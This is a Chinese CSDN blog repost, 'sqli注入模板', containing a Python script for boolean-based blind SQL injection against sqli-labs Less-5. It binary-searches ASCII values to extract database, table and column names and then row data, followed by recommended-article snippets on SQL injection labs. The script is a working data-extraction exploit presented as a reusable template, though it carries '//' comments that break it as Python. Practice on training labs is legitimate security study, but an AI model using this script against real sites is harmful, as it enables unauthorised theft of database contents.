sqli注入模板

最新推荐文章于 2024-08-05 15:32:37 发布
最新推荐文章于 2024-08-05 15:32:37 发布
阅读量118 收藏
点赞数
分类专栏: sql注入脚本 文章标签: python
原文链接:https://blog.csdn.net/weixin_43952190/article/details/107437756?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161882714216780271536045%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=161882714216780271536045&b
版权 
import requests
url="http://192.168.43.92/sqli-labs-master/Less-5/?id=' and "
def name(db_name,t_name,d_name,num):
    for j in range(0,20)://此处是爆破出所有数据库
        res=''
        for i in range(1,20)://此处是依次爆破出数据库的字符,一般数据库名称也不会太长
            l=0
            r=127
            mid=(l+r)>>1
            while(l<r)://二分法懂吧,逐渐将l,r范围缩小
                pay0="(ascii(mid((select schema_name from information_schema.schemata limit {0},1),{1},1))>{2})--+".format(j,i,mid)//j是第几个数据库,i是第几个字符,mid是用二分法来确定字符,从65(A)到127(z)
                pay1="(ascii(mid((select table_name from information_schema.tables where table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
                pay2="(ascii(mid((select column_name from information_schema.columns where table_name='"+t_name+"' and table_schema='"+db_name+"' limit {0},1),{1},1))>{2})--+".format(j,i,mid)
                pay3="(ascii(mid((select "+d_name+" from "+db_name+"."+t_name+" limit {0},1),{1},1))>{2})--+".format(j,i,mid)
                if(num==0):
                    r1=requests.get(url+pay0)    
                if(num==1):
                    r1=requests.get(url+pay1)
                if(num==2):
                    r1=requests.get(url+pay2)
                if(num==3):
                    r1=requests.get(url+pay3)
                if("You are in" in r1.text):
                    l=mid+1        //正确时左值逐渐增加
                else:
                    r=mid    	//不正确右值重新变为中间值,左值为上一个正确时的左值,否则左值变为上个正确字符的左值
                mid = (l+r)>>1		//改变中间值逐渐范围缩小
            if(mid==0):
                break
            res+=chr(mid)
        if(res==''):
            break
        print(res)
def main():
    print("所有数据库的名称:")
    name('','','',0)
    db_name=input("请输入要查询表的数据库名称:")
    name(db_name,'','',1)
    t_name=input("请输入要查询字段名的表名:")
    name(db_name,t_name,'',2)
    d_name=input("请输入要查询内容的字段名:")
    name(db_name,t_name,d_name,3)
if __name__ == "__main__":
    main()
抬头、展望45°天空
关注
专栏目录
PHP+MysqlSQL注入源码 下载
01-01
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
SQL注入的一个ASP网站源码
12-06
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
SQL各种注入详解加案例--持续更新
最新发布
m0_72286569的博客
08-05 1439
sql执行的时候,floor是向下取整,配合rand(0)*2产生的前五位数字一定是01101,这下就简单了,我们来模拟group_by过程,遍历 表第一行时,先计算出一个 x=0security,查临时表,不存在,再次计算 x 然后插入 x=1security;id=1”,这里的?时间盲注和布尔盲注的区别是,不管输入的数据正不正确只显示一个跳转页面,当然在注入的时候可以加一个sleep函数使得页面进行沉睡,当访问正确的时候,页面沉睡几秒后跳转,访问错误页面即可跳转。1,当输入Less-1/?
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
常见的web攻击方式之服务器端模板注入
Stealth_pain的博客
02-14 3500
服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。下面举一个例子: 使用 Flask 构建一个基本的 Web 应用程序: from flask import Flask from flask import request, render_template...
sql注入 练手网站_简单SQL注入的手工测试
weixin_32364911的博客
02-04 1365
练习基础模块41、判断闭合字符和列数正常显示内容双引号闭合 " 显示正常页面这个就不是闭合字符双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符由图片来开还有括号的存在 )尝试闭合字符 -- - 成功接下来获取表的列数order by 5 -- -这个报错说明 数据表的列数为42、获取数据的数据回显点和数据获取数据在第二行的地方可以查询回显数据数据库查询 leettime_761wHole查...
mysql注入-sqlilabs靶场注入
10-15
SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些关卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 ...
sqlilabs过关手册注入天书.pdf
09-14
"sqlilabs过关手册注入天书.pdf"是关于SQL注入学习与实践的一份资料,主要围绕名为sqli-labs的实验室环境进行介绍和讲解。 首先,文档提到了SQL注入sqli-labs的介绍,强调了SQL注入的危害以及学习SQL注入的重要性...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
Sqli注入Web测试环境.zip
02-13
这个"Sqli注入Web测试环境.zip"是一个专为测试和学习SQL注入漏洞而设计的靶场。靶场提供了实践和理解SQL注入攻击以及如何防御它们的机会。 首先,你需要一个Web服务器环境来运行这个靶场。这可能包括Apache、Nginx...
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书》是一本专注于SQL注入技术的教程书籍,由lcamry编写,于2016年7月发布。该手册旨在引导读者通过一个名为sqlilabs的实验平台,来学习和掌握SQL注入的多种技巧和方法。 ### SQL注入基础 ...
sql-injection-demo:尝试SQL注入的准系统模板
05-16
SQL注入示例代码 重要说明:请勿将此代码放在其他人可以访问的服务器上。 要启动并运行: 在MySQL中创建数据库,并在bad-inj-show.php编辑以下bad-inj-show.php行以进行匹配: $ dsn = 'mysql:dbname=my_dbname;host=127.0.0.1' ; $ user = 'my_user' ; $ password = 'my_password' ; 使用以下命令从db_dump.sql文件插入my_users表: $ mysql -u my_user -pmy_password my_db_name < db_dump.sql 使用或类的代码在本地托管代码。 导航到浏览器中的bad-inj.php页面,然后处理表单。 以下是一些可尝试输入的示例: ed@example.com a" OR 1 = 1 -- a"
本地搭建含有简单sql注入漏洞的网站
mukami0621的博客
12-06 2万+
本地搭建简单的sql注入漏洞网站 注入过一些有sql注入漏洞的网站,但是自己本地搭建倒还是第一次尝试.... 安装phpstudy 集成了Apache+PHP+MySQL+phpMyAdmin等的神奇工具,可以直接就搭建出一个本地网站,比如网址为http://127.0.0.1/phpinfo.php的 编写login.php和test.php(编写漏洞页面) login
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 1010
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 7284
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
php sql注入
技术的搬运工
01-16 2329
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
SQL注入基础样例1
qq_49283465的博客
05-02 584
其次我们尝试通过字符转义、传入大数id=50000000等各种方式来使其报错—此处表示你已经过了waf(即使你不会),我们观察他的闭合方式,诱导语句闭合并使用- -+把后面语句注释掉。小知识:我们要知道SQL语句的闭合方式:无符号闭合、单引号—‘’、双引号—“”、单引号与括号联动—‘)、双引号与括号联动—“)、单引号括号双引号—‘)“、以及搜索语句中—‘%’闭合。攻击方式:报错注入、union联合注入、布尔盲注、时间盲注、http头注入、宽字节注入(中国网站)、文件注入、DNS注入等。
SQL注入
热门推荐
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
sqlilabs注入天书下载
06-15
sqlilabs注入天书是一份关于SQL注入攻击技术的详细教材,它包含了从初级到高级的各种技术和实践案例。该天书适合网络安全研究人员、安全测试爱好者、信息安全从业人员等阅读学习。 在sqlilabs注入天书中,作者深入浅出地介绍了SQL注入攻击的原理和技巧,并且通过大量的例子详细地解释了如何检测和利用SQL注入漏洞。该天书还包含了众多的实验场景,读者可以跟随实验一步步学习SQL注入攻击技术的具体实现方法。 sqlilabs注入天书的下载是极为方便的,只需在互联网上搜索相关关键字,就可以很快找到可供下载的版本。但是,在使用该天书进行学习和研究时,需要格外注意自我防范,避免对他人的系统造成伤害。 总之,sqlilabs注入天书作为一份优秀的SQL注入教材,不仅具有深度和广度,还为安全研究人员提供了实用性较强的攻击技术和实践指导。同时,在使用该天书时,也需要明确自己的目的和态度,保持自我约束和责任心,避免对他人系统和网络的安全造成伤害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值